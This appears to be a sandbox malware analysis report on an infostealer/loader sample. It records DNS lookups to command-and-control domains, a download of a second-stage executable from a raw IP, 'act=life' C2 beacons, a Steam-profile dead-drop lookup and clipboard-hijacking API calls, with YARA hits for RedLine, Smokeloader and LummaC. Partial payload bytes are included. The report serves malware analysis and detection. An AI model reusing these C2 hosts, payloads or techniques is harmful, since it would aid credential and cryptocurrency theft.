Dec 14, 2024 14:12:52.661006927 CET	192.168.2.4	1.1.1.1	0xbb8f	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:56.173424959 CET	192.168.2.4	1.1.1.1	0xf433	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.018982887 CET	192.168.2.4	1.1.1.1	0x2c56	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.179780006 CET	192.168.2.4	1.1.1.1	0xbe7c	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.324973106 CET	192.168.2.4	1.1.1.1	0x27d9	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.503865004 CET	192.168.2.4	1.1.1.1	0x7e5f	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.656713009 CET	192.168.2.4	1.1.1.1	0x6729	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.797862053 CET	192.168.2.4	1.1.1.1	0xf8f9	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.938951015 CET	192.168.2.4	1.1.1.1	0x28f7	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 14, 2024 14:12:44.230386972 CET	1.1.1.1	192.168.2.4	0x30c3	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:44.230386972 CET	1.1.1.1	192.168.2.4	0x30c3	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:52.659321070 CET	1.1.1.1	192.168.2.4	0x9cb8	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:52.805876017 CET	1.1.1.1	192.168.2.4	0xbb8f	No error (0)	immureprech.biz		104.21.22.222	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:52.805876017 CET	1.1.1.1	192.168.2.4	0xbb8f	No error (0)	immureprech.biz		172.67.207.38	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:56.317714930 CET	1.1.1.1	192.168.2.4	0xf433	No error (0)	deafeninggeh.biz		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:56.317714930 CET	1.1.1.1	192.168.2.4	0xf433	No error (0)	deafeninggeh.biz		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:56.317714930 CET	1.1.1.1	192.168.2.4	0xf433	No error (0)	deafeninggeh.biz		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:56.317714930 CET	1.1.1.1	192.168.2.4	0xf433	No error (0)	deafeninggeh.biz		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:56.317714930 CET	1.1.1.1	192.168.2.4	0xf433	No error (0)	deafeninggeh.biz		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:56.317714930 CET	1.1.1.1	192.168.2.4	0xf433	No error (0)	deafeninggeh.biz		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:56.317714930 CET	1.1.1.1	192.168.2.4	0xf433	No error (0)	deafeninggeh.biz		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.159318924 CET	1.1.1.1	192.168.2.4	0x2c56	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.317240000 CET	1.1.1.1	192.168.2.4	0xbe7c	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.462673903 CET	1.1.1.1	192.168.2.4	0x27d9	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.642215014 CET	1.1.1.1	192.168.2.4	0x7e5f	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.796127081 CET	1.1.1.1	192.168.2.4	0x6729	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:12:59.936794043 CET	1.1.1.1	192.168.2.4	0xf8f9	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 14:13:00.076380014 CET	1.1.1.1	192.168.2.4	0x28f7	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

immureprech.biz

deafeninggeh.biz

steamcommunity.com

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	176.113.115.19	80	7276	C:\Users\user\Desktop\TN78WX7nJU.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 14:12:46.516954899 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 14, 2024 14:12:47.867899895 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 13:12:47 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 14 Dec 2024 13:00:02 GMT ETag: "58600-6293a86885370" Accept-Ranges: bytes Content-Length: 361984 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSfRMtMMeGMs=tjZS MzRMdRMaRRichSPEL2e?\@Cl)PB0.textl `.rdataL"$@@.data=@p @.rsrc0B@@
Dec 14, 2024 14:12:47.867947102 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 5c 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 51 08 00 00 6a 0c 68 50 25 44 00 e8 7b 16 00 00 8b 75 08 85 f6 74 75 83 3d Data Ascii: %\D;@DuQjhP%D{utu=uCjkYeVYEtVPYYE}u7ujWYVj54nDDu"DPY?UQeVEPuuu9Et
Dec 14, 2024 14:12:47.867964029 CET	448	IN	Data Raw: 56 e8 cc 30 00 00 59 83 f8 ff 74 1b 83 f8 fe 74 16 8b d0 c1 fa 05 8b c8 83 e1 1f c1 e1 06 03 0c 95 40 a3 81 00 eb 05 b9 08 4c 44 00 f6 41 24 7f 75 29 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 c1 f9 05 83 e0 1f c1 e0 06 03 04 8d 40 a3 81 00 eb 05 b8 08 Data Ascii: V0Ytt@LDA$u)tt@LD@$tWWWWW%M9}uNxAV,YEEEuV5,YUQSVW5l5h}YY;+CrwW
Dec 14, 2024 14:12:47.873892069 CET	1236	IN	Data Raw: e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 60 10 00 00 c3 e8 15 25 00 00 c3 8b ff 55 8b ec ff 75 08 e8 b7 ff ff ff f7 d8 1b c0 f7 d8 59 48 5d c3 8b ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 b1 32 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 83 3d 0c 6b Data Ascii: EE`%UuYH]Ujju2]U=kDu)u_'h$YY]jXh%D3uEP@Dj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CSYujXY
Dec 14, 2024 14:12:47.987637997 CET	1236	IN	Data Raw: c0 eb 51 6a 0a e8 59 00 00 00 59 89 5d fc 39 1e 75 2c 68 a0 0f 00 00 57 e8 a2 35 00 00 59 59 85 c0 75 17 57 e8 ac f4 ff ff 59 e8 3f fe ff ff c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 91 f4 ff ff 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b Data Ascii: QjYY]9u,hW5YYuWY?]>WYEEHj(YUEV4AD>uP"Yuj]Y6D^]U\|kU+Pr;r3]UMAVuW+yiD
Dec 14, 2024 14:12:47.987704992 CET	448	IN	Data Raw: c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 d8 10 44 00 85 c0 75 08 83 c8 ff e9 9d 00 00 00 8d 97 00 70 00 00 89 55 fc 3b fa 77 43 8b ca 2b cf c1 e9 0c 8d 47 10 41 83 48 f8 ff 83 88 ec 0f 00 00 ff 8d 90 fc 0f 00 00 89 10 8d 90 fc ef ff ff c7 40 fc Data Ascii: yhWDupU;wC+GAH@PIuUEOHAJHAdD3GFCENCux!P_^[UMASVuW}+QiDM
Dec 14, 2024 14:12:47.987741947 CET	1236	IN	Data Raw: 1c fb 89 5d 10 8b 5b 04 89 59 04 8b 5d 10 89 59 08 89 4b 04 8b 59 04 89 4b 08 8b 59 04 3b 59 08 75 57 8a 4c 07 04 88 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13 00 75 0e 8b cf bb 00 00 00 80 d3 eb 8b 4d 08 09 19 8d 44 90 44 8b cf eb 20 80 7d Data Ascii: ][Y]YKYKY;YuWLML s}uMDD }uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB
Dec 14, 2024 14:12:47.987776041 CET	1236	IN	Data Raw: 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 40 44 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc Data Ascii: D$l$l$+SVW@D1E3PeuEEEEdMdY__^[]QUS]Vs35@DWEE{tN38NF38E@fMUS[EMt_I[LDEEt,.E\|@GE
Dec 14, 2024 14:12:47.987808943 CET	1236	IN	Data Raw: 33 c9 29 85 e4 fa ff ff 8b 95 e4 fa ff ff 8d 84 0e 1d 01 00 00 03 d0 8d 5a 20 83 fb 19 77 0c 80 4c 0e 1d 10 8a d1 80 c2 20 eb 0f 83 fa 19 77 0e 80 4c 0e 1d 20 8a d1 80 ea 20 88 10 eb 03 c6 00 00 41 3b cf 72 c2 8b 4d fc 5f 33 cd 5b e8 38 e4 ff ff Data Ascii: 3)Z wL wL A;rM_3[8jh8&DGDGptltwhuj &YjYewhu;5FDt6tVDuBDtVYFDGh5FDuVDEujW
Dec 14, 2024 14:12:47.987845898 CET	1236	IN	Data Raw: c1 df ff ff 59 e8 54 e9 ff ff c7 00 16 00 00 00 eb 04 83 65 e0 00 8b 45 e0 e8 73 f6 ff ff c3 83 3d 70 b4 81 00 00 75 12 6a fd e8 56 fe ff ff 59 c7 05 70 b4 81 00 01 00 00 00 33 c0 c3 8b ff 55 8b ec 53 56 8b 75 08 8b 86 bc 00 00 00 33 db 57 3b c3 Data Ascii: YTeEs=pujVYp3USVu3W;to=(MDth;t^9uZ;t9uPH.YY;t9uP'.YYYY;tD9u@-P+P
Dec 14, 2024 14:12:47.988058090 CET	1236	IN	Data Raw: ff be 70 12 44 00 56 ff 15 24 10 44 00 85 c0 75 07 56 e8 bc 05 00 00 59 89 45 e4 8b 75 08 c7 46 5c b8 18 44 00 33 ff 47 89 7e 14 85 c0 74 24 68 60 12 44 00 50 8b 1d 48 10 44 00 ff d3 89 86 f8 01 00 00 68 8c 12 44 00 ff 75 e4 ff d3 89 86 fc 01 00 Data Ascii: pDV$DuVYEuF\D3G~t$h`DPHDhDu~pCKCFhBDjYevhDE>jY}EFluHDFlvlYE3GujYjYVWD5HD

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.179.207	443	7276	C:\Users\user\Desktop\TN78WX7nJU.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 13:12:45 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-14 13:12:46 UTC	800	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 13:12:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G9pSSM0sVEwuOaFd9xb1kODihJ4fCdC%2BELGcO2qX%2BTQO4EzxjrnFXDF9zn0j7xab8P8zG0G2%2FaznkDC0Nabu4gS6PaKGqcviOzDAkkEic6DO9vqckQ0NtguQxCtinXXskw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e7285ec454283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1579&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=728&delivery_rate=1796923&cwnd=241&unsent_bytes=0&cid=2e3912c8d45fefb4&ts=675&x=0"
2024-12-14 13:12:46 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-14 13:12:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.22.222	443	7396	C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 13:12:54 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 13:12:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 13:12:56 UTC	1012	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 13:12:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9u613si7a5mtad28d4kftc5lmq; expires=Wed, 09-Apr-2025 06:59:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j3hGrLi5Oc3%2BpvafsMv1WqrzCUhwvsJo7HdaOTJv2i3ruq5U9JA6KYFSiGuzekH2rfon9Ii4gdBcJ8wPoKoHVo9%2FciKC1rDsjxNYlfFJjHK4TJDbvnvInaoRiD%2BSldoGaDo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e72bcdc650fa3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1493&rtt_var=569&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1906005&cwnd=222&unsent_bytes=0&cid=c2730a90891c3fd4&ts=2124&x=0"
2024-12-14 13:12:56 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 13:12:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.96.1	443	7396	C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 13:12:57 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 13:12:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 13:12:59 UTC	1010	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 13:12:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d6q0ehdbr3sv4petf9upkfpdaf; expires=Wed, 09-Apr-2025 06:59:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2Lj%2FjRLUB%2F1SInJhDJvALSKcwDEnOj0udIsH5MyuYPvNzEOpwYjNQN4SZVkpLQCJ2NIL%2F6UITlzLIPJUbVu5k8QHTKqi8nLdJiDcEFj1ZKPC2nIDXly5L2SsBLVO5Eyg3Pr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e72d14b1dde9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1631&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1717647&cwnd=209&unsent_bytes=0&cid=533e8101cab46191&ts=1491&x=0"
2024-12-14 13:12:59 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 13:12:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	23.55.153.106	443	7396	C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 13:13:01 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 13:13:02 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 13:13:02 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=be643b83ce4522182e6a9965; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 13:13:02 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 13:13:02 UTC	10097	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 13:13:02 UTC	10555	IN	Data Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 Data Ascii: ;WEB_UNIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":&qu

Target ID:	0
Start time:	08:12:40
Start date:	14/12/2024
Path:	C:\Users\user\Desktop\TN78WX7nJU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TN78WX7nJU.exe"
Imagebase:	0x400000
File size:	457'216 bytes
MD5 hash:	E1C246E51C4460E34A3429A6FC397942
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	08:12:48
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\C455.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\C455.tmp.exe"
Imagebase:	0x400000
File size:	361'984 bytes
MD5 hash:	D88E2431ABAC06BDF0CD03C034B3E5E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000003.1874232972.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:13:03
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1684
Imagebase:	0x500000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	5.8%
Total number of Nodes:	736
Total number of Limit Nodes:	21

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
